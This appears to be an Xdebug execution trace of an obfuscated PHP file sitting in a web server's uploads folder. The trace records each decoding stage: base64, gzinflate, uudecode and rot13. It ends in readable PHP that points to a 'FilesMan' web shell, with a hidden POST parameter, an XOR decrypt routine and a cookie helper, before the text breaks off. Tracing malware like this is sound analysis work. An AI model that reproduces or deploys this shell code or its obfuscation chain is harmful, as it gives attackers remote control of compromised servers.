Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:04:21.722951]
1	0	1	0.000152	393528
1	3	0	0.000396	460032	{main}	1		/var/www/html/uploads/hahaha.php	0	0
1		A						/var/www/html/uploads/hahaha.php	1	$asqdg5sgr1erSDF65g1erb65FDr1b6er5b1erberVb7erbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1erSDF65g1erb65FDr1b6er5b1erberVb7erbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1erSDF65g1erb65FDr1b6er5b1erberVb7erbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1erSDF65g1erb65FDr1b6er5b1erberVb7erbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1erSDF65g1erb65FDr1b6er5b1erberVb7erbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1erSDF65g1erb65FDr1b6er5b1erberVb7erbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5 = 'HJ1XmqM4FIXfexeAAWNyMDnnnHP0/lcxqnmanq+bwkj3nvMflZCryZgMeyc/r8HZXVtrXNXSGtpVcO8lIbv/XuAw9H14l9bFz67rPVkLl8K6JrL086+6lt0xWKJLKwTfgyyd9Fs+T3mf7tZs2Ld7Zk0xvjgj3aKlUAehMvLPdLwGmLsqcPXgTUUm25Q90HqkX1ngTCoRSOyTR5zh61/GkfXuIpCyRpdQkZ3KQhYhPPEpRv5VO0ZTQW9MM6lWhXhZ3UmRqs/+6KTbGeMSk5zwBBVfwsPxjK4ubqmpaH1ZYvmC/1UHDdsDRDvV0MjzS6xy5W0cN6MtWySaUGs0gTUdEXgwvkz7eagK3CMq2DWEz3n8qxavsVz7jUYXUtzxwTIW2YzWoOr7l7IqOJMahPH2hl7JSJyVHGPvZCv4tExe6/ivml9LUyS0L/hS4Ra4+Xy2G4NVuWmY+4PnwsiJissuVSQs3TWvY+E8o0w0CFw1339VGxanqiuaRaPiMCSVoLyt'
2	4	0	0.000479	460032	base64_decode	0		/var/www/html/uploads/hahaha.php	1	1	'HJ1XmqM4FIXfexeAAWNyMDnnnHP0/lcxqnmanq+bwkj3nvMflZCryZgMeyc/r8HZXVtrXNXSGtpVcO8lIbv/XuAw9H14l9bFz67rPVkLl8K6JrL086+6lt0xWKJLKwTfgyyd9Fs+T3mf7tZs2Ld7Zk0xvjgj3aKlUAehMvLPdLwGmLsqcPXgTUUm25Q90HqkX1ngTCoRSOyTR5zh61/GkfXuIpCyRpdQkZ3KQhYhPPEpRv5VO0ZTQW9MM6lWhXhZ3UmRqs/+6KTbGeMSk5zwBBVfwsPxjK4ubqmpaH1ZYvmC/1UHDdsDRDvV0MjzS6xy5W0cN6MtWySaUGs0gTUdEXgwvkz7eagK3CMq2DWEz3n8qxavsVz7jUYXUtzxwTIW2YzWoOr7l7IqOJMahPH2hl7JSJyVHGPvZCv4tExe6/ivml9LUyS0L/hS4Ra4+Xy2G4NVuWmY+4PnwsiJissuVSQs3TWvY+E8o0w0CFw1339VGxanqiuaRaPiMCSVoLyt'
2	4	1	0.000668	513312
2	4	R			'\034W8\024{\027\001cr09sW1yH\037ɘ\f{\'?][k\\\032Up%!^0}xϮ=Y\vº&󯺖1XK+\004߃,[>Oylط{fM18#ݢP\a2t\006*pME&۔=z_YL*\021HG_Ƒ"FPB\026!<)FU;FSAoL3VxYI\031\022\004\025_.nh}YbU\a\r\003D;Krm\0347-[$Pk45\035\021x0Ly\n#*5y\026\\F\027R2\026ٌ֠*8\032^H\034cd+L^_KS$/R\026|\033Uiȉ.U$,5c<L4\b\\5U\033\026+E0$jV;\005ÚB6?O6\r/wO+{U'
1		A						/var/www/html/uploads/hahaha.php	1	$biojhbHBiuhbIU1GB5145rg5JKSFV5DB11B5B1Hbndfdfbg2g2bhn0tn5n5j1156gb1rt6b1e56be5b1e5be56b1b0rn0n5n8899g9eebf3b1df2bdfbdfnjdnfjvhdbfibdbrn4rn1rtn5r6tn1rtn51rt655111fg62b1fg3n1f61er5g1rerjgabqnxkcpmgh5h5j8jiojhbHBiuhbIU1GB5145rg5JKSFV5DB11B5B1Hbndfdfbg2g2bhn0tn5n5j1156gb1rt6b1e56be5b1e5be56b1b0rn0n5n8899g9eebf3b1df2bdfbdfnjdnfjvhdbfibdbrn4rn1rtn5r6tn1rtn51rt655111fg62b1fg3n1f61er5g1rerjgabqnxkcpmgh5h5j8jiojhbHBiuhbIU1GB5145rg5JKSFV5DB11B5B1Hbndfdfbg2g2bhn0tn5n5j1156gb1rt6b1e56be5b1e5be56b1b0rn0n5n8899g9eebf3b1df2bdfbdfnjdnfjvhdbfibdbrn4rn1rtn5r6tn1rtn51rt655111fg62b1fg3n1f61er5g1rerjgabqnxkcpmgh5h5j8jiojhbHBiuhbIU1GB5145rg5JKSFV5DB11B5B1Hbndfdfbg2g2bhn0tn5n5j1156gb1rt6b1e56be5b1e5be56b1b0rn0n5n8899g9eebf3b1df2bdfbdfnjdnfjvhdbfibdbrn4rn1rtn5r6tn1rtn51rt655111fg62b1fg3n1f61er5g1rerjgabqnxkcpmgh5h5j8jiojhbHBiuhbIU1GB5145rg5JKSFV5DB11B5B1Hbndfdfbg2g2bhn0tn5n5j1156gb1rt6b1e56be5b1e5be56b1b0rn0n5n8899g9eebf3b1df2bdfbdfnjdnfjvhdbfibdbrn4rn1rtn5r6tn1rtn51rt655111fg62b1fg3n1f61er5g1rerjgabqnxkcpmgh5h5j8jiojhbHBiuhbIU1GB5145rg5JKSFV5DB11B5B1Hbndfdfbg2g2bhn0tn5n5j1156gb1rt6b1e56be5b1e5be56b1b0rn0n5n8899g9eebf3b1df2bdfbdfnjdnfjvhdbfibdbrn4rn1rtn5r6tn1rtn51rt655111fg62b1fg3n1f61er5g1rerjgabqnxkcpmgh5h5j8jiojhbHBiuhbIU1GB5145rg5JKSFV5DB11B5B1Hbndfdfbg2g2bhn0tn5n5j1156gb1rt6b1e56be5b1e5be56b1b0rn0n5n8899g9eebf3b1df2bdfbdfnjdnfjvhdbfibdbrn4rn1rtn5r6tn1rtn51rt655111fg62b1fg3n1f61er5g1rerjgabqnxkcpmgh5h5j8j = '\034W8\024{\027\001cr09sW1yH\037ɘ\f{\'?][k\\\032Up%!^0}xϮ=Y\vº&󯺖1XK+\004߃,[>Oylط{fM18#ݢP\a2t\006*pME&۔=z_YL*\021HG_Ƒ"FPB\026!<)FU;FSAoL3VxYI\031\022\004\025_.nh}YbU\a\r\003D;Krm\0347-[$Pk45\035\021x0Ly\n#*5y\026\\F\027R2\026ٌ֠*8\032^H\034cd+L^_KS$/R\026|\033Uiȉ.U$,5c<L4\b\\5U\033\026+E0$jV;\005ÚB6?O6\r/wO+{U'
2	5	0	0.002045	513280	gzinflate	0		/var/www/html/uploads/hahaha.php	1	1	'\034W8\024{\027\001cr09sW1yH\037ɘ\f{\'?][k\\\032Up%!^0}xϮ=Y\vº&󯺖1XK+\004߃,[>Oylط{fM18#ݢP\a2t\006*pME&۔=z_YL*\021HG_Ƒ"FPB\026!<)FU;FSAoL3VxYI\031\022\004\025_.nh}YbU\a\r\003D;Krm\0347-[$Pk45\035\021x0Ly\n#*5y\026\\F\027R2\026ٌ֠*8\032^H\034cd+L^_KS$/R\026|\033Uiȉ.U$,5c<L4\b\\5U\033\026+E0$jV;\005ÚB6?O6\r/wO+{U'
2	5	1	0.002882	566560
2	5	R			'MU;U;>Z+*$S?Z@>9O@8=9O-@7\'A$4#ZB(W"DDBB"Z4XWBI]](U=W0H":93/-_\nM]WZ?;/)QHM#\'ZCIHU:^6\\\\6ZU^P<O/(@\\IOKT$0;HYEWK8S2M;J*U[$S"0]M\nM]SAUKI6>,>S-:E:]IC?U8)C4/_JE0;B:5.?6:Q])#LN%WD76?M=#W2D\\\'UF#\nMZ&-,CR;UV+8MK3]=Q\\,+8B/`-GQZ.;]3GJ)A28\'WD[?A;QNK^4OM-:WWF6]"\nM[-">S!-?MSO6V$3MJ7(;[^.9WYE3<!P;OC=U[EQHM1LHRVSMK\'A)M"@;2*\\[\nMWAO=@>(%E]#K^F[/.=+OT=S8:Z5,=M"I4O#.AZO-X+E3V7J&/^GYK1HLG$XT\nMV$WOKG-B2B4K@K\'<_*Y^&"86OO.^*\'J2T037@/WME2WQ]VXTK?_T6)O#"MO5\nMPDK\\8:79=-%3SSGM27(=OMO7S-8Q7&&O\\+ED9^>5>1S:_DHOB>"W?5Z'
1		A						/var/www/html/uploads/hahaha.php	1	$cdrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15ndrnr6e5n1e6n1re6tn1e65n1r6tn1r6en1er695gr498erg4e9rg45614EB54DF5B4DbJKHbjhbijhgeg15156165SD1GS6D5G1SGSDGDBJKHVJHGvuhgvihjdfbndfjbndklgrfnfn15n = 'MU;U;>Z+*$S?Z@>9O@8=9O-@7\'A$4#ZB(W"DDBB"Z4XWBI]](U=W0H":93/-_\nM]WZ?;/)QHM#\'ZCIHU:^6\\\\6ZU^P<O/(@\\IOKT$0;HYEWK8S2M;J*U[$S"0]M\nM]SAUKI6>,>S-:E:]IC?U8)C4/_JE0;B:5.?6:Q])#LN%WD76?M=#W2D\\\'UF#\nMZ&-,CR;UV+8MK3]=Q\\,+8B/`-GQZ.;]3GJ)A28\'WD[?A;QNK^4OM-:WWF6]"\nM[-">S!-?MSO6V$3MJ7(;[^.9WYE3<!P;OC=U[EQHM1LHRVSMK\'A)M"@;2*\\[\nMWAO=@>(%E]#K^F[/.=+OT=S8:Z5,=M"I4O#.AZO-X+E3V7J&/^GYK1HLG$XT\nMV$WOKG-B2B4K@K\'<_*Y^&"86OO.^*\'J2T037@/WME2WQ]VXTK?_T6)O#"MO5\nMPDK\\8:79=-%3SSGM27(=OMO7S-8Q7&&O\\+ED9^>5>1S:_DHOB>"W?5Z'
2	6	0	0.003073	566528	convert_uudecode	0		/var/www/html/uploads/hahaha.php	1	1	'MU;U;>Z+*$S?Z@>9O@8=9O-@7\'A$4#ZB(W"DDBB"Z4XWBI]](U=W0H":93/-_\nM]WZ?;/)QHM#\'ZCIHU:^6\\\\6ZU^P<O/(@\\IOKT$0;HYEWK8S2M;J*U[$S"0]M\nM]SAUKI6>,>S-:E:]IC?U8)C4/_JE0;B:5.?6:Q])#LN%WD76?M=#W2D\\\'UF#\nMZ&-,CR;UV+8MK3]=Q\\,+8B/`-GQZ.;]3GJ)A28\'WD[?A;QNK^4OM-:WWF6]"\nM[-">S!-?MSO6V$3MJ7(;[^.9WYE3<!P;OC=U[EQHM1LHRVSMK\'A)M"@;2*\\[\nMWAO=@>(%E]#K^F[/.=+OT=S8:Z5,=M"I4O#.AZO-X+E3V7J&/^GYK1HLG$XT\nMV$WOKG-B2B4K@K\'<_*Y^&"86OO.^*\'J2T037@/WME2WQ]VXTK?_T6)O#"MO5\nMPDK\\8:79=-%3SSGM27(=OMO7S-8Q7&&O\\+ED9^>5>1S:_DHOB>"W?5Z'
2	6	1	0.003180	607520
2	6	R			'ս[{\0237oY\027\036\021\024\017)$ SHР&L~lq:hկź\034 D\033wҵױ3\t\017m8u1jV7`?ATk\037I\016˅E~C)<\037YcL&ض-?]\vb#6|z9SaIo\033K5oBО\023_;Dr\033ߙSp\034\0337u\\h\033(lxI(\033H;\033݁\005n9kLvЩR·Sz?\032,N4MsbJ%+~\030&\026(z\004׀-n4X\nJatS9Ir\0351\\adgy\034J/}^װϞIX\\#yf\016}9zH6Ou`ϴߛ=<qp|p1e`x\nK'
1		A						/var/www/html/uploads/hahaha.php	1	$ddd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1dd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1dd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1dd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1dd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1dd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1dd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1dd4fdBf4bDf5b4Dgnn02ny1y2n03rn03d2b0d3f2b0d0S32G0DF32G0SD30S3GERRH51RTH3RTH0RN30R3NRN51R5T6N1R4RT98H7RT98G4RT9G51R561651651g1d32fgd3h21rth51rt6h5r1th2rt1h32b0rt31h5h1ty5ujuil65io1l6i51lu6i5k1 = 'ս[{\0237oY\027\036\021\024\017)$ SHР&L~lq:hկź\034 D\033wҵױ3\t\017m8u1jV7`?ATk\037I\016˅E~C)<\037YcL&ض-?]\vb#6|z9SaIo\033K5oBО\023_;Dr\033ߙSp\034\0337u\\h\033(lxI(\033H;\033݁\005n9kLvЩR·Sz?\032,N4MsbJ%+~\030&\026(z\004׀-n4X\nJatS9Ir\0351\\adgy\034J/}^װϞIX\\#yf\016}9zH6Ou`ϴߛ=<qp|p1e`x\nK'
2	7	0	0.004432	607488	str_rot13	0		/var/www/html/uploads/hahaha.php	1	1	'ս[{\0237oY\027\036\021\024\017)$ SHР&L~lq:hկź\034 D\033wҵױ3\t\017m8u1jV7`?ATk\037I\016˅E~C)<\037YcL&ض-?]\vb#6|z9SaIo\033K5oBО\023_;Dr\033ߙSp\034\0337u\\h\033(lxI(\033H;\033݁\005n9kLvЩR·Sz?\032,N4MsbJ%+~\030&\026(z\004׀-n4X\nJatS9Ir\0351\\adgy\034J/}^װϞIX\\#yf\016}9zH6Ou`ϴߛ=<qp|p1e`x\nK'
2	7	1	0.005197	644384
2	7	R			'ս[{\0237bL\027\036\021\024\017)$ FUР&Y~yd:uկź\034 Q\033jҵױ3\t\017z8h1wI7`?NGx\037V\016˅R~P)<\037LpY&ض-?]\vo#6|m9FnVb\033X5bOО\023_;Qe\033ߙFc\034\0337h\\u\033(ykV(\033U;\033݁\005a9xYiЩE·Fm?\032,A4ZfoW%+~\030&\026(m\004׀-a4K\nWngF9Ve\0351\\nqtl\034W/}^װϞVK\\#ls\016}9mU6Bh`ϴߛ=<dc|c1r`k\nX'
1		A						/var/www/html/uploads/hahaha.php	1	$e03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N03d2b0d3f2b0d0S32G0DF32G0SD30S3Gerbe1r3b20etb0b00Ftb0r0tr3b2rt3516zfSDGzegzegz9ergz6e5gRRJGRZG5sqdg5sgr1ERRH51RTH3RTH0RN30R3NRN51R5T6N = 'ս[{\0237bL\027\036\021\024\017)$ FUР&Y~yd:uկź\034 Q\033jҵױ3\t\017z8h1wI7`?NGx\037V\016˅R~P)<\037LpY&ض-?]\vo#6|m9FnVb\033X5bOО\023_;Qe\033ߙFc\034\0337h\\u\033(ykV(\033U;\033݁\005a9xYiЩE·Fm?\032,A4ZfoW%+~\030&\026(m\004׀-a4K\nWngF9Ve\0351\\nqtl\034W/}^װϞVK\\#ls\016}9mU6Bh`ϴߛ=<dc|c1r`k\nX'
2	8	0	0.006449	644352	gzinflate	0		/var/www/html/uploads/hahaha.php	1	1	'ս[{\0237bL\027\036\021\024\017)$ FUР&Y~yd:uկź\034 Q\033jҵױ3\t\017z8h1wI7`?NGx\037V\016˅R~P)<\037LpY&ض-?]\vo#6|m9FnVb\033X5bOО\023_;Qe\033ߙFc\034\0337h\\u\033(ykV(\033U;\033݁\005a9xYiЩE·Fm?\032,A4ZfoW%+~\030&\026(m\004׀-a4K\nWngF9Ve\0351\\nqtl\034W/}^װϞVK\\#ls\016}9mU6Bh`ϴߛ=<dc|c1r`k\nX'
2	8	1	0.007425	754976
2	8	R			'aWYgKCFpc3NldCgkX1BPU1RbJ2x5bngnXSkpIHsNCg0KJOKWmyA9ICIiOyAvL2FkbWluDQok4paYID0gdHJ1ZTsNCiTilpwgPSAnVVRGLTgnOw0KJOKWmiA9ICdGaWxlc01hbic7DQok4paZID0gbWQ1KCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7DQoNCmZ1bmN0aW9uIGRlY3J5cHQoJHN0ciwkcHdkKXskcHdkPWJhc2U2NF9lbmNvZGUoJHB3ZCk7JHN0cj1iYXNlNjRfZGVjb2RlKCRzdHIpOyRlbmNfY2hyPSIiOyRlbmNfc3RyPSIiOyRpPTA7d2hpbGUoJGk8c3RybGVuKCRzdHIpKXtmb3IoJGo9MDskajxzdHJsZW4oJHB3ZCk7JGorKyl7JGVuY19jaHI9Y2hyKG9yZCgkc3RyWyRpXSleb3JkKCRwd2RbJGpdKSk7JGVuY19zdHIuPSRlbmNfY2hyOyRpKys7aWYoJGk+PXN0'
1		A						/var/www/html/uploads/hahaha.php	1	$fy5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6 = 'aWYgKCFpc3NldCgkX1BPU1RbJ2x5bngnXSkpIHsNCg0KJOKWmyA9ICIiOyAvL2FkbWluDQok4paYID0gdHJ1ZTsNCiTilpwgPSAnVVRGLTgnOw0KJOKWmiA9ICdGaWxlc01hbic7DQok4paZID0gbWQ1KCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7DQoNCmZ1bmN0aW9uIGRlY3J5cHQoJHN0ciwkcHdkKXskcHdkPWJhc2U2NF9lbmNvZGUoJHB3ZCk7JHN0cj1iYXNlNjRfZGVjb2RlKCRzdHIpOyRlbmNfY2hyPSIiOyRlbmNfc3RyPSIiOyRpPTA7d2hpbGUoJGk8c3RybGVuKCRzdHIpKXtmb3IoJGo9MDskajxzdHJsZW4oJHB3ZCk7JGorKyl7JGVuY19jaHI9Y2hyKG9yZCgkc3RyWyRpXSleb3JkKCRwd2RbJGpdKSk7JGVuY19zdHIuPSRlbmNfY2hyOyRpKys7aWYoJGk+PXN0'
2	9	0	0.007626	754944	base64_decode	0		/var/www/html/uploads/hahaha.php	1	1	'aWYgKCFpc3NldCgkX1BPU1RbJ2x5bngnXSkpIHsNCg0KJOKWmyA9ICIiOyAvL2FkbWluDQok4paYID0gdHJ1ZTsNCiTilpwgPSAnVVRGLTgnOw0KJOKWmiA9ICdGaWxlc01hbic7DQok4paZID0gbWQ1KCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7DQoNCmZ1bmN0aW9uIGRlY3J5cHQoJHN0ciwkcHdkKXskcHdkPWJhc2U2NF9lbmNvZGUoJHB3ZCk7JHN0cj1iYXNlNjRfZGVjb2RlKCRzdHIpOyRlbmNfY2hyPSIiOyRlbmNfc3RyPSIiOyRpPTA7d2hpbGUoJGk8c3RybGVuKCRzdHIpKXtmb3IoJGo9MDskajxzdHJsZW4oJHB3ZCk7JGorKyl7JGVuY19jaHI9Y2hyKG9yZCgkc3RyWyRpXSleb3JkKCRwd2RbJGpdKSk7JGVuY19zdHIuPSRlbmNfY2hyOyRpKys7aWYoJGk+PXN0'
2	9	1	0.007973	865568
2	9	R			'if (!isset($_POST[\'lynx\'])) {\r\n\r\n$▛ = ""; //admin\r\n$▘ = true;\r\n$▜ = \'UTF-8\';\r\n$▚ = \'FilesMan\';\r\n$▙ = md5($_SERVER[\'HTTP_USER_AGENT\']);\r\n\r\nfunction decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}\r\nfunction prototype($k, $v) { $_COOKIE[$k] = $v;se'
1		A						/var/www/html/uploads/hahaha.php	1	$gy5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6